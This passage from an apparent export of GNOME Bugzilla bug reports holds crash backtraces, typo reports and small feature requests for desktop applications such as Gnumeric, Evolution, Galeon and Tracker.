#37 0x0061dce9 in IA__g_signal_emit (instance=0x82ca000 signal_id=64 
    detail=0) at gsignal.c:2241
#38 0x0122cdb8 in gtk_widget_event_internal (widget=0x82ca000 
    event=0x8bbcd90) at gtkwidget.c:3901
#39 0x010fbba9 in IA__gtk_main_do_event (event=0x8bbcd90) at gtkmain.c:1354
#40 0x004452da in gdk_event_dispatch (source=0x820d608 callback=0 
    user_data=0x0) at gdkevents-x11.c:2314
#41 0x042981bd in IA__g_main_context_dispatch (context=0x820d650)
    at gmain.c:1916
#42 0x0429b43f in g_main_context_iterate (context=0x820d650 block=1 
    dispatch=1 self=0x819e8e8) at gmain.c:2547
#43 0x0429b7e9 in IA__g_main_loop_run (loop=0x835d2c8) at gmain.c:2751
#44 0x010fbf54 in IA__gtk_main () at gtkmain.c:999
#45 0x0806d644 in main (argc=1 argv=0xbfc69534) at main.c:375
Thread 5 (Thread 130821024 (LWP 2726)):
#0  0x00abe402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x013ed550 in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x0429b473 in g_main_context_iterate (context=0x828b2f8 block=1 
    dispatch=1 self=0x8216378) at gmain.c:2849
	got_ownership = 
Thread 4 (Thread 91507616 (LWP 2735)):
#0  0x00abe402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x005df67c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x003cc063 in g_cond_timed_wait_posix_impl (cond=0x87731e0 
    entered_mutex=0x8285cd0 abs_time=0x5744400) at gthread-posix.c:231
	result = 
Thread 3 (Thread -1236948064 (LWP 2780)):
#0  0x00abe402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x005df406 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00e339d6 in gst_system_clock_async_thread (clock=0x8bda650)
    at gstsystemclock.c:257
	entry = (GstClockEntry *) 0x8bb18d8
	res = 14891227
	sysclock = (GstSystemClock *) 0x8bda650
	__PRETTY_FUNCTION__ = gst_system_clock_async_thread
#3  0x042b5ebf in g_thread_create_proxy (data=0x8bb18d8) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#4  0x005dc40b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0x013f6b7e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread 50383776 (LWP 2904)):
#0  0x00abe402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x005df406 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00e339d6 in gst_system_clock_async_thread (clock=0x8c00c30)
    at gstsystemclock.c:257
	entry = (GstClockEntry *) 0x87c3280
	res = 14891227
	sysclock = (GstSystemClock *) 0x8c00c30
	__PRETTY_FUNCTION__ = gst_system_clock_async_thread
#3  0x042b5ebf in g_thread_create_proxy (data=0x87c3280) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#4  0x005dc40b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0x013f6b7e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1208723760 (LWP 2724)):
#0  0x00abe402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x005e2c0b in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x002f88dd in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:812
	estatus = -1077510408
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {6539968 142039520 22931773 15134716 135941600 12 
      3217456744 14977276 3217456984 146654284 3217456744 14964746 
      3217457004 3217456984 135941632 15134716 20 9 3217456936 
      14776498 135933200 146654284 0 20 135921184 1 28 0 8 
      20520988 6154557 6445969}} sa_flags = 135911240 sa_restorer = 0x14}
	pid =</t>
  </si>
  <si>
    <t>GALEON-69383</t>
  </si>
  <si>
    <t>Bookmarks</t>
  </si>
  <si>
    <t>Small bug with smart toolbar</t>
  </si>
  <si>
    <t>I use JS calculator as smart bookmark:
javascript:with(Math){evl=parseFloat(eval(unescape(%s)))}if(isNaN(evl)){alert('Not
a number!')}else{void(prompt('Result:'evl))}
but this smart bookmark don't shrink when I click on bookmark icon (entry
field is always visible).
That is not a problem but toolbar looks ugly. :(</t>
  </si>
  <si>
    <t>ric</t>
  </si>
  <si>
    <t>vlisivka</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-152145</t>
  </si>
  <si>
    <t>Keyboard</t>
  </si>
  <si>
    <t>keyboard rate doesn't know if it's an int or a float</t>
  </si>
  <si>
    <t>My key repeat rate is way too fast.  When I run gnome-keyboard-properties and
touch the speed slider I get
      An error occurred while loading or saving configuration information for 
      gnome-settings-daemon. Some of your configuration settings may not work 
      properly.
      Type mismatch: Expected `int' got `float' for key 
      /desktop/gnome/peripherals/keyboard/rate
so something's confused about what type rate should be.
I tried to fix it like this:
    quit gnome-keyboard-properties
    run gconf-editor
    Unset key rate
    New key rate make sure it's in integer
    run gnome-keyboard-properties again
    now magically rate is a float again not an int and
    gnome-keyboard-properties produces the same error.
I also tried killing gconfd-2 at various stages in this process with no luck.
I can't figure out where the default values/types of these things live.  Is
there some file that has gotten corrupted?  Where should I look to fix this?
It's strange that while gnome-keyboard-properties seems to want it to be an int
it's the act of touching gnome-keyboard-properties that causes it to transform
from an in to a float causing the error.
Fedora Core 2
control-center-2.6.1-3
gconf-editor-2.6.0-1
GConf2-2.6.0-7
Linux 2.6.8-1.521smp #1 SMP Mon Aug 16 09:25:06 EDT 2004 i686 athlon i386</t>
  </si>
  <si>
    <t>jwz</t>
  </si>
  <si>
    <t>EPIPHANY-117705</t>
  </si>
  <si>
    <t>Building against moz CVS</t>
  </si>
  <si>
    <t>From my (brief) experiments with moz CVS it looks like they may have a new
$(includedir)/history subdirectory that has to be included by epiphany for
it to build. This could be a moz .pc bug.
(That's what it looked like at first glance I may be wrong)</t>
  </si>
  <si>
    <t>aes</t>
  </si>
  <si>
    <t>GLIB-508771</t>
  </si>
  <si>
    <t>gio</t>
  </si>
  <si>
    <t>There is no g_file_test/exists() for GFile</t>
  </si>
  <si>
    <t>I don't see any way in GFile to check for the existence of a file path or URI without attempting a read. A simple g_file_exists() would be nice though that name is taken by a glib file that just works on gchar* paths:
http://library.gnome.org/devel/glib/unstable/glib-File-Utilities.html</t>
  </si>
  <si>
    <t>GNOME-PANEL-375326</t>
  </si>
  <si>
    <t>Fix a couple leaks reported by valgrind</t>
  </si>
  <si>
    <t>patch attached</t>
  </si>
  <si>
    <t>GARNOME-106388</t>
  </si>
  <si>
    <t>GARNOME</t>
  </si>
  <si>
    <t>BlueCurve theme doesn'y set Nautilus icons</t>
  </si>
  <si>
    <t>bluecurve icon theme doesn't set icons for nautilus (all icons in nautilus
turn into the defatul sheet of paper).
All other icon themes work fine.</t>
  </si>
  <si>
    <t>maxx</t>
  </si>
  <si>
    <t>GALEON-123150</t>
  </si>
  <si>
    <t>Mozilla interaction</t>
  </si>
  <si>
    <t>Pressing Escape in unknown mime type dialog continues downloading file</t>
  </si>
  <si>
    <t>If you click a link for which no gnome handlers are available and mozilla
can't handle it and then press escape (on the keyboard) the file continues
to be downloaded.
This happens for me on any .bz2 file e.g. from kernel.org
It seems as though the mime_ask_dialog_download_cancel function never
gets called.</t>
  </si>
  <si>
    <t>gnomebugs.philipl</t>
  </si>
  <si>
    <t>PYGTK-68930</t>
  </si>
  <si>
    <t>PYGTK</t>
  </si>
  <si>
    <t>gtk_layout_get_size wrapper</t>
  </si>
  <si>
    <t>Here's a wrapper for gtk_layout_get_size:
%%
override gtk_layout_get_size 
noargs
static PyObject *
_wrap_gtk_layout_get_size(PyGObject *self)
{
    guint 
width height
    gtk_layout_get_size(GTK_WIDGET(self-&gt;obj) 
return Py_BuildValue((ii) width height)
}</t>
  </si>
  <si>
    <t>skip</t>
  </si>
  <si>
    <t>NAUTILUS-100376</t>
  </si>
  <si>
    <t>double negation in message</t>
  </si>
  <si>
    <t>#: components/emblem/nautilus-emblem-view.c:720
msgid 
None of the files could not be added as emblems because they did not appear
to be valid images.
I assume that the first occurance of the word 'not' is not meant to be there.</t>
  </si>
  <si>
    <t>jwillcox</t>
  </si>
  <si>
    <t>GNUMERIC-72030</t>
  </si>
  <si>
    <t>GNUMERIC</t>
  </si>
  <si>
    <t>Gnumeric exited while changing cell color</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: grave
Version:  0.61
Synopsis: Gnumeric exited while changing cell color
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
After doig several operatios in the sheet tryed to change the color of
a cell. Then the system gave a message indicating a fatal error the
Gnumeric system exited automatically without chance to save done work.
Debugging information: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0x407a8519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a8519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408189e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4027a7e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x400af944 in emit_change () at eval.c:41
#5  0x400aec2c in marshal_NONE__POINTER_BOOL () at eval.c:41
#6  0x403fa916 in gtk_handlers_run () at eval.c:41
#7  0x403f9c3d in gtk_signal_real_emit () at eval.c:41
#8  0x403f79f5 in gtk_signal_emit () at eval.c:41
#9  0x400af609 in color_group_add_color () at eval.c:41
#10 0x400af92f in emit_change () at eval.c:41
#11 0x400afc49 in color_clicked () at eval.c:41
#12 0x403c72b1 in gtk_marshal_NONE__NONE () at eval.c:41
#13 0x403fa916 in gtk_handlers_run () at eval.c:41
#14 0x403f9c3d in gtk_signal_real_emit () at eval.c:41
#15 0x403f79f5 in gtk_signal_emit () at eval.c:41
#16 0x4035ef2d in gtk_button_clicked () at eval.c:41
#17 0x403606ed in gtk_real_button_released () at eval.c:41
#18 0x403c72b1 in gtk_marshal_NONE__NONE () at eval.c:41
#19 0x403f9ac1 in gtk_signal_real_emit () at eval.c:41
#20 0x403f79f5 in gtk_signal_emit () at eval.c:41
#21 0x4035ee5d in gtk_button_released () at eval.c:41
#22 0x4035ffd7 in gtk_button_button_release () at eval.c:41
#23 0x403c6fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#24 0x403f9c7d in gtk_signal_real_emit () at eval.c:41
#25 0x403f79f5 in gtk_signal_emit () at eval.c:41
#26 0x404320e9 in gtk_widget_event () at eval.c:41
#27 0x403c6f15 in gtk_propagate_event () at eval.c:41
#28 0x403c5f3f in gtk_main_do_event () at eval.c:41
#29 0x4047de4f in gdk_event_dispatch () at eval.c:41
#30 0x406107f3 in g_main_dispatch () at eval.c:41
#31 0x40610dd9 in g_main_iterate () at eval.c:41
#32 0x40610f8c in g_main_run () at eval.c:41
#33 0x403c5803 in gtk_main () at eval.c:41
#34 0x080663d2 in _start () at eval.c:41
#35 0x08066435 in main () at eval.c:41
#36 0x4070a177 in __libc_start_main (main=0x8066420  argc=1 
    ubp_av=0xbffff8dc init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffff8cc)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a8519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408189e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4027a7e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x830bd70
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 137411952
result = 0
#3  
No locals.
#4  0x400af944 in emit_change () at eval.c:41
41	in eval.c
ap = (void **) 0x830bd70
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8458338 M
result = 137411952
result = 138773304
#5  0x400aec2c in marshal_NONE__POINTER_BOOL () at eval.c:41
41	in eval.c
ap = (void **) 0x830bd70
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8458338 M
result = 137411952
result = 138773304
#6  0x403fa916 in gtk_handlers_run () at eval.c:41
41	in eval.c
ap = (void **) 0x830bd70
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8458338 M
result = 137411952
result = 138773304
#7  0x403f9c3d in gtk_signal_real_emit () at eval.c:41
41	in eval.c
ap = (void **) 0x81dce8c
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0xbfffe8a0 \017
result = 136171148
result = 3221219488
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-02-20 11:33 -------
The original reporter (mocampo@fisica.unam.mx) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>mocampo</t>
  </si>
  <si>
    <t>NETWORKMANAGER-300822</t>
  </si>
  <si>
    <t>Spelling errors in new string</t>
  </si>
  <si>
    <t>#: panel-applet/NMWirelessApplet.c:232
# c-format
msgid 
VPN Login Failure\n
\n
Could not connection to theVPN connection '%s' due to a login failure.\n
\n
The VPN service said: \%s\
It should either be Could not open connection or Could not connect. Also you need a space in the 
word theVPN.</t>
  </si>
  <si>
    <t>RHYTHMBOX-526139</t>
  </si>
  <si>
    <t>Removable Media</t>
  </si>
  <si>
    <t>Doesn't select CDDA source when autostarting</t>
  </si>
  <si>
    <t>When auto-launched from nautilus after an audio CD is inserted Rhythmbox doesn't select the CD source as it should.
A couple of problems:
- desktop file doesn't say it can handle urls so only local filenames are passed (which is why iPod autostart would work for example as a local dirname is passed)
- Playlist parsing in the shell drops unhandled results from totem-pl-parser when we should at least try to find a source for the item
- gnome-vfs and gvfs use different URLs for cdda. cdda:///dev/sr0 under gnome-vfs would be cdda://sr0/ under gvfs</t>
  </si>
  <si>
    <t>GNOME-MEDIA-37885</t>
  </si>
  <si>
    <t>gtcd</t>
  </si>
  <si>
    <t>GNOME-MEDIA</t>
  </si>
  <si>
    <t>Crash on closure of netscape.</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gtcd
Severity: normal
Version:  1.2.0
Synopsis: Crash on closure of netscape.
Class:    sw-bug
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.2-12
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
Was playing music with GTCD and browsing with latest version of Netscape
navigator and when I close netscape. GTCD crashed.
Debugging information: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0x4055de69 in __wait4 () from /lib/libc.so.6
#0  0x4055de69 in __wait4 () from /lib/libc.so.6
#1  0x405c9e4c in __DTOR_END__ () from /lib/libc.so.6
#2  0x40093b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x402fb36b in XSetForeground () from /usr/X11R6/lib/libX11.so.6
#5  0x40296fa3 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
#6  0x804f8c0 in draw_titles ()
#7  0x804fb68 in draw_status ()
#8  0x804ff3f in slow_timer ()
#9  0x4045d983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#10 0x4045c987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x4045d001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#12 0x4045d1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x401dee57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x8051225 in main ()
#15 0x404c1f31 in __libc_start_main (main=0x8050fa0  argc=1 
    ubp_av=0xbffff984 init=0x804d778  fini=0x8059a3c  
    rtld_fini=0x4000e274  stack_end=0xbffff97c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x4055de69 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405c9e4c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40093b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x402fb36b in XSetForeground () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#5  0x40296fa3 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
No symbol table info available.
#6  0x804f8c0 in draw_titles ()
No symbol table info available.
#7  0x804fb68 in draw_status ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:42 -------
This bug was previously known as bug 37885 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=37885
Originally filed under the gnome-media product and gtcd component.
Unknown version 1.2.x in product gnome-media. Setting version to the default unspecified.
The original reporter (letheron@bigfoot.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>letheron</t>
  </si>
  <si>
    <t>GNOME-SETTINGS-DAEMON-759595</t>
  </si>
  <si>
    <t>mouse</t>
  </si>
  <si>
    <t>GNOME-SETTINGS-DAEMON</t>
  </si>
  <si>
    <t>mouse: Remove support for non-libinput mouse configurations</t>
  </si>
  <si>
    <t>gnome-settings-daemon-maint</t>
  </si>
  <si>
    <t>GTK+-322780</t>
  </si>
  <si>
    <t>Backend: Win32</t>
  </si>
  <si>
    <t>ComboBox's don't look native</t>
  </si>
  <si>
    <t>GtkComboBox doesn't look like a native widget whereas the older GtkOptionMenu
did come reasonably close.  I'm concerned with the ms-windows theme here.  From
a quick look through the code it looks like the trick is figuring out when a
button entry etc is part of a combo box.</t>
  </si>
  <si>
    <t>gtk-win32-maint</t>
  </si>
  <si>
    <t>jpe</t>
  </si>
  <si>
    <t>TRACKER-482491</t>
  </si>
  <si>
    <t>Indexer Crashes on fasta (text)  file</t>
  </si>
  <si>
    <t>Steps to reproduce:
1.Start trackerd 
2. 
3. 
Stack trace:
service id for Documents is 4 and sid is 28424 with mime application/postscript
mime is application/x-palm-database for /home/bjoern/hex/examples/hÃ¤m/environments/2DN2_B_ENV_5A.pdb
file extension is pdb
file /home/bjoern/hex/examples/hÃ¤m/environments/2DN2_B_ENV_5A.pdb is indexable
file /home/bjoern/hex/examples/hÃ¤m/environments/2DN2_B_ENV_5A.pdb has fulltext 0 with service Other
Indexing /home/bjoern/hex/examples/hÃ¤m/environments/2DN2_B_ENV_5A.pdb with service Other and mime application/x-palm-database (new)
service id for Other is 10 and sid is 28425 with mime application/x-palm-database
mime is application/x-palm-database for /home/bjoern/hex/examples/hÃ¤m/environments/chainb-enva matched-10A.pdb
file extension is pdb
file /home/bjoern/hex/examples/hÃ¤m/environments/chainb-enva matched-10A.pdb is indexable
file /home/bjoern/hex/examples/hÃ¤m/environments/chainb-enva matched-10A.pdb has fulltext 0 with service Other
Indexing /home/bjoern/hex/examples/hÃ¤m/environments/chainb-enva matched-10A.pdb with service Other and mime application/x-palm-database (new)
service id for Other is 10 and sid is 28426 with mime application/x-palm-database
file /home/bjoern/hex/examples/hÃ¤m/environments has fulltext 0 with service Folders
Indexing /home/bjoern/hex/examples/hÃ¤m/environments with service Folders and mime Folder (new)
service id for Folders is 3 and sid is 28427 with mime Folder
0 files are pending with count 0
checking /home/bjoern/hex/examples/hÃ¤m/chains for 19 files
mime is text/plain for /home/bjoern/hex/examples/hÃ¤m/chains/2DN2-chain_c.fasta
file extension is fasta
file /home/bjoern/hex/examples/hÃ¤m/chains/2DN2-chain_c.fasta is indexable
file /home/bjoern/hex/examples/hÃ¤m/chains/2DN2-chain_c.fasta has fulltext 1 with service Text
Indexing /home/bjoern/hex/examples/hÃ¤m/chains/2DN2-chain_c.fasta with service Text and mime text/plain (new)
service id for Text is 8 and sid is 28428 with mime text/plain
Speicherzugriffsfehler
the file:
&gt; 2DN2-chain_c.pdb
VLSPADKTNVKAAWGKVGAHAGEYGAEALERMFLSFPTTKTYFPHFDLSHGSAQVKGHGKKVADALTNAVAHVDDMPNALSALSDLHAHKLRVDPVNFKLLSHCLLVTLAAHLPAEFTPAVHASLDKFLASVSTVLTSKYR
Other information:
Sorry at the moment i've no debuging symbols enabled. I tried also to set the no index var to:
NoIndexFileTypes=*.fasta but this dosen't help. is the syntax wrong?</t>
  </si>
  <si>
    <t>moonstruxx</t>
  </si>
  <si>
    <t>EVOLUTION-345646</t>
  </si>
  <si>
    <t>Crash After Sending Appointment</t>
  </si>
  <si>
    <t>Steps to reproduce:
I have one user that is getting this often. We are watching for a pattern.  But what happens is that he submits a personal GW appointment and the detail screen closes and Evo dumps.  The appointment is on the calendar after Evo is re-opened.
Stack trace:
acktrace was generated from '/opt/gnome/bin/evolution-2.6'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1231436096 (LWP 19368)]
[New Thread -1280578640 (LWP 19660)]
[Thread debugging using libthread_db enabled]
[New Thread -1231436096 (LWP 19368)]
[New Thread -1280578640 (LWP 19660)]
[Thread debugging using libthread_db enabled]
[New Thread -1231436096 (LWP 19368)]
[New Thread -1280578640 (LWP 19660)]
[New Thread -1272185936 (LWP 19480)]
[New Thread -1290798160 (LWP 19467)]
[New Thread -1255044176 (LWP 19420)]
[New Thread -1246614608 (LWP 19379)]
[New Thread -1241863248 (LWP 19370)]
[New Thread -1241781328 (LWP 19369)]
0xffffe410 in ?? ()
#0 0xffffe410 in ?? ()
#1 0xbfffd564 in ?? ()
#2 0x00000000 in ?? ()
#3 0xbfffd498 in ?? ()
#4 0xb6dc22eb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#5 0xb78f67d8 in gnome_init_with_popt_table ()
from /opt/gnome/lib/libgnomeui-2.so.0
#6 
#7 0xffffe410 in ?? ()
#8 0xbfffd85c in ?? ()
#9 0x00000006 in ?? ()
#10 0x00004ba8 in ?? ()
#11 0xb6ae12c1 in raise () from /lib/tls/libc.so.6
#12 0xb6ae2b75 in abort () from /lib/tls/libc.so.6
#13 0xb7be49ff in mono_handle_native_sigsegv () from /usr/lib/libmono.so.0
#14 0xb7bc3a61 in mini_method_compile () from /usr/lib/libmono.so.0
#15 
#16 0xb5e7accd in preview_recur (rpage=0x8b29440) at recurrence-page.c:849
#17 0xb5e7d85e in preview_date_range_changed_cb (item=0x8b2e118 
data=0x8b29440) at recurrence-page.c:2043
#18 0xb6c708a6 in g_cclosure_marshal_VOID__VOID ()
from /opt/gnome/lib/libgobject-2.0.so.0
#19 0xb6c638db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#20 0xb6c72d8b in g_signal_chain_from_overridden ()
from /opt/gnome/lib/libgobject-2.0.so.0
#21 0xb6c7413b in g_signal_emit_valist ()
from /opt/gnome/lib/libgobject-2.0.so.0
#22 0xb703ed25 in gtk_signal_emit () from /opt/gnome/lib/libgtk-x11-2.0.so.0
#23 0xb7f9ba34 in e_calendar_item_signal_emission_idle_cb (data=0x8b2e118)
at e-calendar-item.c:3233
#24 0xb6bf5051 in g_list_push_allocator ()
from /opt/gnome/lib/libglib-2.0.so.0
#25 0xb6bf6967 in g_main_context_dispatch ()
from /opt/gnome/lib/libglib-2.0.so.0
#26 0xb6bf8ce2 in g_main_context_acquire ()
from /opt/gnome/lib/libglib-2.0.so.0
#27 0xb6bf9cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#28 0xb73ebcf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#29 0x0805fa43 in main (argc=2 argv=0xbfffe8e4) at main.c:611
Thread 8 (Thread -1241781328 (LWP 19369)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb5fbe438 in ?? ()
No symbol table info available.
#2 0xb7d25338 in ?? () from /usr/lib/libmono.so.0
No symbol table info available.
#3 0x00000000 in ?? ()
No symbol table info available.
#4 0xb6dc1b16 in __nanosleep_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb7c91c3a in mono_method_full_name () from /usr/lib/libmono.so.0
No symbol table info available.
#6 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 7 (Thread -1241863248 (LWP 19370)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb5faa250 in ?? ()
No symbol table info available.
#2 0x00000635 in ?? ()
No symbol table info available.
#3 0x00000000 in ?? ()
No symbol table info available.
#4 0xb6dbeccc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb7c975a7 in _wapi_handle_unlock_handles () from /usr/lib/libmono.so.0
No symbol table info available.
#6 0xb7c977f4 in _wapi_handle_timedwait_signal_handle ()
from /usr/lib/libmono.so.0
No symbol table info available.
#7 0xb7c97697 in _wapi_handle_wait_signal_handle ()
from /usr/lib/libmono.so.0
No symbol table info available.
#8 0xb7ca69eb in WaitForSingleObjectEx () from /usr/lib/libmono.so.0
No symbol table info available.
#9 0xb7c3ec2e in mono_gc_finalize_notify () from /usr/lib/libmono.so.0
No symbol table info available.
#10 0xb7c53d80 in mono_thread_get_tls_offset () from /usr/lib/libmono.so.0
No symbol table info available.
#11 0xb7ca4ba7 in _wapi_thread_abandon_mutexes () from /usr/lib/libmono.so.0
No symbol table info available.
#12 0xb7cc1635 in GC_start_routine () from /usr/lib/libmono.so.0
No symbol table info available.
#13 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#14 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1246614608 (LWP 19379)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb5b22408 in ?? ()
No symbol table info available.
#2 0x00000004 in ?? ()
No symbol table info available.
#3 0x00000000 in ?? ()
No symbol table info available.
#4 0xb6dbea56 in pthread_cond_wait@@GLIBC_2.3.2 ()
from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb7a03d86 in e_msgport_wait (mp=0x8146c18) at e-msgport.c:660
_buffer = {__routine = 0xb7a03bb3  
__arg = 0x8146c18 __canceltype = -1246616728 __prev = 0x0}
msg = (EMsg *) 0x0
#6 0xb7a0464e in thread_dispatch (din=0x8146bb8) at e-msgport.c:1022
e = (EThread *) 0x8146bb8
m = (EMsg *) 0x0
info = (struct _thread_info *) 0x8153700
self = 3048352688
#7 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1255044176 (LWP 19420)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb5318358 in ?? ()
No symbol table info available.
#2 0xffffffff in ?? ()
No symbol table info available.
#3 0x00000009 in ?? ()
No symbol table info available.
#4 0xb6b6a954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5 0xb6bf8c73 in g_main_context_acquire ()
from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6 0xb6bf9cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7 0xb7367600 in link_set_io_thread () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#8 0xb6c12fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1290798160 (LWP 19467)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb30ff408 in ?? ()
No symbol table info available.
#2 0x00000006 in ?? ()
No symbol table info available.
#3 0x00000000 in ?? ()
No symbol table info available.
#4 0xb6dbea56 in pthread_cond_wait@@GLIBC_2.3.2 ()
from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb7a03d86 in e_msgport_wait (mp=0x8146c18) at e-msgport.c:660
_buffer = {__routine = 0xb7a03bb3  
__arg = 0x8146c18 __canceltype = 140265112 __prev = 0x0}
msg = (EMsg *) 0x0
#6 0xb7a0464e in thread_dispatch (din=0x8146bb8) at e-msgport.c:1022
e = (EThread *) 0x8146bb8
m = (EMsg *) 0x0
info = (struct _thread_info *) 0x8627228
self = 3004169136
#7 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1272185936 (LWP 19480)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb42bf408 in ?? ()
No symbol table info available.
#2 0x00000001 in ?? ()
No symbol table info available.
#3 0x00000000 in ?? ()
No symbol table info available.
#4 0xb6dbea56 in pthread_cond_wait@@GLIBC_2.3.2 ()
from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb7a03d86 in e_msgport_wait (mp=0x8120948) at e-msgport.c:660
_buffer = {__routine = 0xb7a03bb3  
__arg = 0x8120948 __canceltype = 141108520 __prev = 0x0}
msg = (EMsg *) 0x0
#6 0xb7a0464e in thread_dispatch (din=0x81208e8) at e-msgport.c:1022
e = (EThread *) 0x81208e8
m = (EMsg *) 0x0
info = (struct _thread_info *) 0x0
self = 3022781360
#7 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1280578640 (LWP 19660)):
